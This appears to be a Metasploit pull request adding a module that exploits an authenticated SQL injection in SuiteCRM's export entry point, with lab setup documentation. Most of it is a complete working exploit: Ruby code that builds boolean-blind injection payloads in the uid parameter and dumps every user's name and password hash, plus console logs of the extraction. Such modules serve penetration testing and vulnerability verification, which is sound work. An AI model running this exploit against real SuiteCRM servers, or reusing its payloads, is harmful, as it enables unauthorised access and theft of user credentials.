### PR TITLE
SuiteCRM auth SQLi auxiliary module 

### DIFF
--- a/documentation/modules/auxiliary/gather/suite_crm_export_sqli.md
+++ b/documentation/modules/auxiliary/gather/suite_crm_export_sqli.md
@@ -5,10 +5,11 @@ hashes from the SuiteCRM database.
 
 ## Vulnerable Application
 
-The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM. 
-An account can be added by authenticating to the GUI. Then at the top of the screen, click the 'Create' dropdown, 
-select 'Create Accounts'. The Name field is the only required field, input a name, click save and the target should 
-be exploitable.
+The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM.
+There should be one in SuiteCRM by default for the administrative user. If you want to test multiple users,
+browse to `/index.php?module=Users&action=index` and then click the `Create New User` button on the left side
+of the screen. Then enter a username and a last name. Then click the `password` tab, and enter a password for
+the user, then confirm this password and click the `Save` button to create the user.
 
 ### Docker compose
 
@@ -122,19 +123,51 @@ The following setup was installed on Ubuntu 20.04:
 
 ## Scenarios
 
-### SuiteCRM 7.12.5 running on Ubuntu 20.04
+### SuiteCRM 7.12.5 Bitnami Docker Image
 ```
-msf6 auxiliary(gather/suite_crm_export_sqli) > set rhosts 192.168.123.207
-rhosts => 192.168.123.207
-msf6 auxiliary(gather/suite_crm_export_sqli) > set username normal_user
-username => normal_user
-msf6 auxiliary(gather/suite_crm_export_sqli) > set password normal_user
-password => normal_user
-rmsf6 auxiliary(gather/suite_crm_export_sqli)) > run
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/gather/suite_crm_export_sqli 
+msf6 auxiliary(gather/suite_crm_export_sqli) > show options
+
+Module options (auxiliary/gather/suite_crm_export_sqli):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   COUNT     3                no        Number of users to enumerate
+   PASSWORD                   yes       Password for user
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                        loit
+   RPORT     80               yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME                   yes       Username of user
+   VHOST                      no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name              Description
+   ----              -----------
+   Dump credentials  Dumps usernames and passwords from the users table
+
+
+msf6 auxiliary(gather/suite_crm_export_sqli) > set USERNAME user
+USERNAME => user
+msf6 auxiliary(gather/suite_crm_export_sqli) > set PASSWORD bitnami
+PASSWORD => bitnami
+msf6 auxiliary(gather/suite_crm_export_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/suite_crm_export_sqli) > check
+
+[*] Authenticating as user
+[+] Authenticated as: user
+[*] Version detected: 7.12.5
+[+] 127.0.0.1:80 - The target is vulnerable.
+msf6 auxiliary(gather/suite_crm_export_sqli) > run
+[*] Running module against 127.0.0.1
 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Authenticating as normal_user
-[+] Authenticated as: normal_user
+[*] Authenticating as user
+[+] Authenticated as: user
 [*] Version detected: 7.12.5
 [+] The target is vulnerable.
 [*] Fetching Users, please wait...
@@ -143,26 +176,20 @@ SuiteCRM User Names
 
  Username
  --------
- JoeDerp
- admin
- msfuser
- non_admin
+ testuser
+ user
 
 [*] Fetching Hashes, please wait...
-[+] (1/4) Username : admin ; Hash : $2y$10$TqjKZ4dWGNYQGiwDu5qSUu0RIsAO7uPRdIvX7gIm4pwjn.2t4ZYvi
-[+] (2/4) Username : JoeDerp ; Hash : $2y$10$Qt4iloeWIQhgVX85cMNHieGVXYltvC/7fDaY1y5MhM90SZpENSJCm
-[+] (3/4) Username : msfuser ; Hash : $2y$10$kr3tWzSZDbM9/y.FLZKf2esC1aghyEMa4e8KovsCCUE/GHlBjkgLe
-[+] (4/4) Username : non_admin ; Hash : $2y$10$A.yaUnsujWh38ODrekuv0OxUGdPRcvKmgpYStJib5VoFigjQQDsfy
+[+] (1/2) Username : testuser ; Hash : $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+[+] (2/2) Username : user ; Hash : $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
 SuiteCRM User Credentials
 =========================
 
- Username   Hash
- --------   ----
- JoeDerp    $2y$10$Qt4iloeWIQhgVX85cMNHieGVXYltvC/7fDaY1y5MhM90SZpENSJCm
- admin      $2y$10$TqjKZ4dWGNYQGiwDu5qSUu0RIsAO7uPRdIvX7gIm4pwjn.2t4ZYvi
- msfuser    $2y$10$kr3tWzSZDbM9/y.FLZKf2esC1aghyEMa4e8KovsCCUE/GHlBjkgLe
- non_admin  $2y$10$A.yaUnsujWh38ODrekuv0OxUGdPRcvKmgpYStJib5VoFigjQQDsfy
+ Username  Hash
+ --------  ----
+ testuser  $2y$10$YFr9.QNPVDXoLKv5FQo7d.UIRBSMTnPGDS2LLHsuGSojAA2Q5kELa
+ user      $2y$10$O83wcCVEfY7GKo//dbQwwOFOevfLFnhpP4d9n98HmGM2YPxJZqMhO
 
-[*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
+msf6 auxiliary(gather/suite_crm_export_sqli) > 
 ```

--- a/documentation/modules/auxiliary/scanner/http/suite_crm_export_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/suite_crm_export_sqli.md
@@ -1,0 +1,168 @@
+## Description
+This module exploits an authenticated SQL injection in SuiteCRM installations below or equal to version 7.12.5. The 
+vulnerability allows for union and blind boolean based SQLi to be exploited in order to collect usernames and password 
+hashes from the SuiteCRM database.
+
+## Vulnerable Application
+
+The SQLi exploited by this module depends on the existence of at least one 'Account' being registered in SuiteCRM. 
+An account can be added by authenticating to the GUI. Then at the top of the screen, click the 'Create' dropdown, 
+select 'Create Accounts'. The Name field is the only required field, input a name, click save and the target should 
+be exploitable.
+
+### Docker compose
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+To create a SuiteCRM 7.12.5 Docker container, first create a new folder, 
+then save the following content as `docker-compose.yml`:
+
+```
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_suitecrm
+      - MARIADB_DATABASE=bitnami_suitecrm
+      - MARIADB_PASSWORD=bitnami123
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.12.5
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - SUITECRM_DATABASE_HOST=mariadb
+      - SUITECRM_DATABASE_PORT_NUMBER=3306
+      - SUITECRM_DATABASE_USER=bn_suitecrm
+      - SUITECRM_DATABASE_NAME=bitnami_suitecrm
+      - SUITECRM_DATABASE_PASSWORD=bitnami123
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'suitecrm_data:/bitnami/suitecrm'
+    depends_on:
+      - mariadb
+volumes:
+  mariadb_data:
+    driver: local
+  suitecrm_data:
+    driver: local 
+```
+
+Finally, in the same directory as the `docker-compose.yml` file, run: `docker-compose up -d`.
+
+Note that the default username to log in will be `user` and the password will be `bitnami`. If you
+want to change these, put the following lines under the `environment` section:
+
+```
+    environment:
+      - SUITECRM_USERNAME=my_user
+      - SUITECRM_PASSWORD=my_password
+```
+
+The above would set the username to `my_user` and the password to `my_password`.
+
+For more information on the docker compose file, refer to
+https://github.com/bitnami/containers/tree/main/bitnami/suitecrm.
+
+### Install from source
+
+Source code can be found here: [SuiteCRM v7.12.5](https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz) 
+
+Instructions on installing from source can be found here: [Installation Guide](https://docs.suitecrm.com/admin/installation-guide/downloading-installing/) 
+
+The following setup was installed on Ubuntu 20.04:
+
+1. Setup and install MySQL:
+    1. `sudo apt update`
+    1. `sudo apt install mysql-server`
+    1. `sudo systemctl start mysql.service`
+    1. `sudo mysql` (open the mysql prompt)
+    1. `mysql> ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';` (change the password 
+       of the root user)
+       
+1. Install Apache
+    1. `sudo apt install apache2`
+    1. `sudo systemctl enable apache2`
+    1. `sudo systemctl start apache2`
+       
+1. Install php and its dependencies
+    1. `sudo apt -y install php7.4`
+    1. `sudo apt install -y php-cli php-common php-curl php-mbstring php-gd php-mysql php-soap php-xml php-imap php-intl php-opcache php-json php-zip`
+    1. `sudo apt install composer`
+    1. `composer install`
+    
+1. Setup and install SuiteCRM 7.12.5
+    1. `wget https://github.com/salesagility/SuiteCRM/archive/refs/tags/v7.12.5.tar.gz`
+    1. `gunzip v7.12.5.tar.gz`
+    1. `tar -xvf v7.12.5.tar`
+    1. `sudo cp -r SuiteCRM-7.12.5/. /var/www/html`
+    1. `cd /var/www/html`
+    1. `sudo chown -R www-data:www-data .`
+    1. `sudo chmod -R 755 .`
+    1. `sudo chmod -R 775 custom modules themes data upload`
+    1. `sudo chmod 775 config_override.php 2>/dev/null`
+    1. Navigate to http://localhost/install.php and follow the installation wizard to complete the install
+    
+
+## Verification Steps
+
+1. Start up metasploit
+1. Do: `use auxiliary/gather/suite_crm_export_sqli`
+1. Do: `set RHOSTS [IP]`
+1. Configure a user and password by setting `USERNAME` and `PASSWORD`.
+1. Do: `run`
+
+## Scenarios
+
+### SuiteCRM 7.12.5 running on Ubuntu 20.04
+```
+msf6 auxiliary(gather/suite_crm_export_sqli) > set rhosts 192.168.123.207
+rhosts => 192.168.123.207
+msf6 auxiliary(gather/suite_crm_export_sqli) > set username normal_user
+username => normal_user
+msf6 auxiliary(gather/suite_crm_export_sqli) > set password normal_user
+password => normal_user
+rmsf6 auxiliary(gather/suite_crm_export_sqli)) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Authenticating as normal_user
+[+] Authenticated as: normal_user
+[*] Version detected: 7.12.5
+[+] The target is vulnerable.
+[*] Fetching Users, please wait...
+SuiteCRM User Names
+===================
+
+ Username
+ --------
+ JoeDerp
+ admin
+ msfuser
+ non_admin
+
+[*] Fetching Hashes, please wait...
+[+] (1/4) Username : admin ; Hash : $2y$10$TqjKZ4dWGNYQGiwDu5qSUu0RIsAO7uPRdIvX7gIm4pwjn.2t4ZYvi
+[+] (2/4) Username : JoeDerp ; Hash : $2y$10$Qt4iloeWIQhgVX85cMNHieGVXYltvC/7fDaY1y5MhM90SZpENSJCm
+[+] (3/4) Username : msfuser ; Hash : $2y$10$kr3tWzSZDbM9/y.FLZKf2esC1aghyEMa4e8KovsCCUE/GHlBjkgLe
+[+] (4/4) Username : non_admin ; Hash : $2y$10$A.yaUnsujWh38ODrekuv0OxUGdPRcvKmgpYStJib5VoFigjQQDsfy
+SuiteCRM User Credentials
+=========================
+
+ Username   Hash
+ --------   ----
+ JoeDerp    $2y$10$Qt4iloeWIQhgVX85cMNHieGVXYltvC/7fDaY1y5MhM90SZpENSJCm
+ admin      $2y$10$TqjKZ4dWGNYQGiwDu5qSUu0RIsAO7uPRdIvX7gIm4pwjn.2t4ZYvi
+ msfuser    $2y$10$kr3tWzSZDbM9/y.FLZKf2esC1aghyEMa4e8KovsCCUE/GHlBjkgLe
+ non_admin  $2y$10$A.yaUnsujWh38ODrekuv0OxUGdPRcvKmgpYStJib5VoFigjQQDsfy
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/suite_crm_export_sqli.rb
+++ b/modules/auxiliary/gather/suite_crm_export_sqli.rb
@@ -1,0 +1,304 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::SQLi
+  include Msf::Exploit::Remote::HttpClient
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SuiteCRM authenticated SQL injection in export functionality',
+        'Description' => %q{
+          This module exploits an authenticated SQL injection in SuiteCRM in versions before 7.12.6. The vulnerability
+          allows an authenticated attacker to send specially crafted requests to the export entry point of the application in order
+          to retrieve all the usernames and their associated password from the database.
+        },
+        'Author' => [
+          'Exodus Intelligence', # Advisory
+          'jheysel-r7', # poc + msf module
+          'Redouane NIBOUCHA <rniboucha@yahoo.fr>' # sql injection help
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/'],
+          ['URL', 'https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6']
+        ],
+        'Actions' => [
+          ['Dump credentials', { 'Description' => 'Dumps usernames and passwords from the users table' }]
+        ],
+        'DefaultAction' => 'Dump credentials',
+        'DisclosureDate' => '2022-05-24',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3]),
+      OptString.new('USERNAME', [true, 'Username of user', '']),
+      OptString.new('PASSWORD', [true, 'Password for user', '']),
+    ]
+  end
+
+  def check
+    authenticated = authenticate
+    return Exploit::CheckCode::Safe('Unable to authenticate to SuiteCRM') unless authenticated
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Home',
+          'action' => 'About'
+        }
+      }
+    )
+
+    return Exploit::CheckCode::Safe('Trying to query the SuiteCRM version information failed') unless res&.body
+
+    version = Rex::Version.new(res.body.match(/Version\s+((?:\d+\.)+\d+).*/)[1])
+    return Exploit::CheckCode::Safe('Could not find retrieve the version of SuiteCRM from the version page') unless version
+
+    print_status "Version detected: #{version}"
+
+    return Exploit::CheckCode::Vulnerable if version <= Rex::Version.new('7.12.5')
+
+    Exploit::CheckCode::Safe
+  end
+
+  def authenticate
+    print_status("Authenticating as #{datastore['USERNAME']}")
+    initial_req = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login'
+        }
+      }
+    )
+
+    return false unless initial_req && initial_req.code == 200 && initial_req.body.include?('SuiteCRM') && initial_req.get_cookies.include?('sugar_user_theme=')
+
+    login = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'module' => 'Users',
+          'action' => 'Authenticate',
+          'return_module' => 'Users',
+          'return_action' => 'Login',
+          'user_name' => datastore['USERNAME'],
+          'username_password' => datastore['PASSWORD'],
+          'Login' => 'Log In'
+        }
+      }
+    )
+
+    return false unless login && login.code == 302 && login.headers['Location'] == 'index.php?module=Home&action=index' && login.get_cookies.include?('sugar_user_theme=')
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Administration',
+          'action' => 'index'
+        }
+      }
+    )
+
+    if res && res.code == 200 && res.body.include?('SuiteCRM') && res.get_cookies.include?('sugar_user_theme=') && res.body.include?('SUGAR.unifiedSearchAdvanced')
+      print_good("Authenticated as: #{datastore['USERNAME']}")
+      true
+    else
+      print_error("Failed to authenticate as: #{datastore['USERNAME']}")
+      false
+    end
+  end
+
+  # This module sends this same request multiple times. In order to reduce code it has beed moved it into it's owm method
+  def send_injection_request_cgi(payload)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'index.php?entryPoint=export'),
+      'encode_params' => false,
+      'vars_post' => {
+        'uid' => payload,
+        'module' => 'Accounts',
+        'action' => 'index'
+      }
+    })
+
+    if res&.code != 200
+      fail_with(Failure::UnexpectedReply, "The server did not respond to the request with the payload: #{payload}")
+    end
+    res
+  end
+
+  # @return an array of usernames
+  def get_user_names(sqli)
+    print_status 'Fetching Users, please wait...'
+    users = sqli.run_sql('select group_concat(DISTINCT user_name) from users')
+    users.split(',')
+  end
+
+  # Use blind boolean SQL injection to determine the user_hashes of given usernames
+  def get_user_hashes(sqli, users)
+    print_status 'Fetching Hashes, please wait...'
+    hashes = []
+    number_of_users = users.size
+    users.each_with_index do |username, index|
+      hash = sqli.run_sql("select user_hash from users where user_name='#{username}'")
+      hashes << [username, hash]
+      print_good "(#{index + 1}/#{number_of_users}) Username : #{username} ; Hash : #{hash}"
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: username,
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(hash),
+        private_data: hash,
+        service_name: 'SuiteCRM',
+        address: datastore['RHOSTS'],
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+    end
+    hashes
+  end
+
+  def init_sqli
+    wrong_resp_length = send_injection_request_cgi(',\\,))+AND+1=2;+--+')&.body&.length
+    fail_with(Failure::UnexpectedReply, 'The server responded unexpectedly to a request sent with uid: ",\\,))+AND+1=2;+--+"') unless wrong_resp_length
+    sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      fail_with(Failure::BadConfig, 'comma in payload') if payload.include?(',')
+      resp_length = send_injection_request_cgi(",\\,))+OR+(#{payload});+--+")&.body&.length
+      resp_length != wrong_resp_length
+    end
+
+    # redefine blind_detect_length and blind_dump_data because of the bad characters the payload cannot include
+
+    def sqli.blind_detect_length(query, _timebased)
+      output_length = 0
+      min_length = 0
+      max_length = 800
+      loop do
+        break if blind_request("length(cast((#{query}) as binary))=#{output_length}")
+
+        flag = blind_request("length(cast((#{query}) as binary))+BETWEEN+#{output_length}+AND+#{max_length}")
+        if flag
+          min_length = output_length + 1
+          if max_length - min_length <= 1
+            if blind_request("length(cast((#{query}) as binary))=#{min_length}")
+              output_length = min_length
+              break
+            elsif blind_request("length(cast((#{query}) as binary))=#{max_length}")
+              output_length = max_length
+              break
+            else
+              fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
+            end
+          end
+          output_length = (min_length + max_length) / 2 + 1
+        else
+          max_length = output_length
+          output_length = (min_length + max_length) / 2 - 1
+        end
+      end
+      output_length
+    end
+
+    def sqli.blind_dump_data(query, length, _known_bits, _bits_to_guess, _timebased)
+      output = [ ]
+      position = 1
+      length.times do |_j|
+        character_value = 0
+        min_value = 0
+        max_value = 1000
+        loop do
+          break if blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{character_value}")
+
+          flag = blind_request("(select ascii(substr((#{query}) from #{position} for 1)))+BETWEEN+#{character_value}+AND+#{max_value}")
+          if flag
+            min_value = character_value + 1
+            if max_value - min_value <= 1
+              if blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{min_value}")
+                character_value = min_value
+                break
+              elsif blind_request("(select ascii(substr((#{query}) from #{position} for 1)))=#{max_value}")
+                character_value = max_value
+                break
+              else
+                fail_with(Failure::UnexpectedReply, 'Somehow this got messed up!')
+              end
+            end
+            character_value = (min_value + max_value) / 2 + 1
+          else
+            max_value = character_value
+            character_value = (min_value + max_value) / 2 - 1
+          end
+        end
+
+        position += 1
+        output << character_value
+      end
+      output.map(&:chr).join
+    end
+
+    sqli
+  end
+
+  def run
+    unless datastore['AutoCheck']
+      authenticated = authenticate
+      fail_with(Failure::NoAccess, 'Unable to authenticate to SuiteCRM') unless authenticated
+    end
+
+    sqli = init_sqli
+    users = get_user_names(sqli)
+
+    user_table = Rex::Text::Table.new(
+      'Header' => 'SuiteCRM User Names',
+      'Indent' => 1,
+      'Columns' => ['Username']
+    )
+
+    users.each do |user|
+      user_table << [user]
+    end
+
+    print_line user_table.to_s
+    creds = get_user_hashes(sqli, users)
+    creds_table = Rex::Text::Table.new(
+      'Header' => 'SuiteCRM User Credentials',
+      'Indent' => 1,
+      'Columns' => ['Username', 'Hash']
+    )
+
+    creds.each do |cred|
+      creds_table << [cred[0], cred[1]]
+    end
+    print_line creds_table.to_s
+  end
+end

--- a/modules/auxiliary/gather/suite_crm_export_sqli.rb
+++ b/modules/auxiliary/gather/suite_crm_export_sqli.rb
@@ -204,7 +204,7 @@ class MetasploitModule < Msf::Auxiliary
       min_length = 0
       max_length = 800
       loop do
-        break if flag = blind_request("length(cast((#{query}) as binary))=#{output_length}")
+        break if blind_request("length(cast((#{query}) as binary))=#{output_length}")
 
         flag = blind_request("length(cast((#{query}) as binary))+BETWEEN+#{output_length}+AND+#{max_length}")
         if flag

--- a/modules/auxiliary/gather/suite_crm_export_sqli.rb
+++ b/modules/auxiliary/gather/suite_crm_export_sqli.rb
@@ -204,7 +204,7 @@ class MetasploitModule < Msf::Auxiliary
       min_length = 0
       max_length = 800
       loop do
-        break if blind_request("length(cast((#{query}) as binary))=#{output_length}")
+        break if flag = blind_request("length(cast((#{query}) as binary))=#{output_length}")
 
         flag = blind_request("length(cast((#{query}) as binary))+BETWEEN+#{output_length}+AND+#{max_length}")
         if flag


### PR DESCRIPTION
The [original advisory](https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-export-request-sql-injection-vulnerability/) by Exodus Intelligence mentions a unauthenticated RCE vulnerability in SuiteCRM. After some enumeration I wasn't able to find an unauthenticated entry point, or an RCE. However I was able to find an authenticated SQLi in the parameter described in the advisory and so this module exploits that SQLi which enables the user to retrieve users and their associated hashes

## Notes
The module uses boolean blind based injection is used to determine the users in the database and each user's hashed password. The password collection takes a minute or two based on connection speed. 

TODO: 

## Verification

```
msf6 auxiliary(scanner/http/suite_crm_export_sqli) > set rhosts 192.168.123.207
rhosts => 192.168.123.207
msf6 auxiliary(scanner/http/suite_crm_export_sqli) > set username admin
username => admin
msf6 auxiliary(scanner/http/suite_crm_export_sqli) > set password admin
password => admin
msf6 auxiliary(scanner/http/suite_crm_export_sqli) > run
[*] Authenticating as admin
[+] Authenticated as: admin
[*] Fetching Users, please wait...
[*] Users = ["admin", "JoeDerp", "msfuser"]
[*] Fetching Hashes, please wait...
[+] (1/3) Username : admin ; Hash : $2y$10$TqjKZ4dWGNYQGiwDu5qSUu0RIsAO7uPRdIvX7gIm4pwjn.2t4ZYvi
[+] (2/3) Username : JoeDerp ; Hash : $2y$10$Qt4iloeWIQhgVX85cMNHieGVXYltvC/7fDaY1y5MhM90SZpENSJCm
[+] (3/3) Username : msfuser ; Hash : $2y$10$kr3tWzSZDbM9/y.FLZKf2esC1aghyEMa4e8KovsCCUE/GHlBjkgLe
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


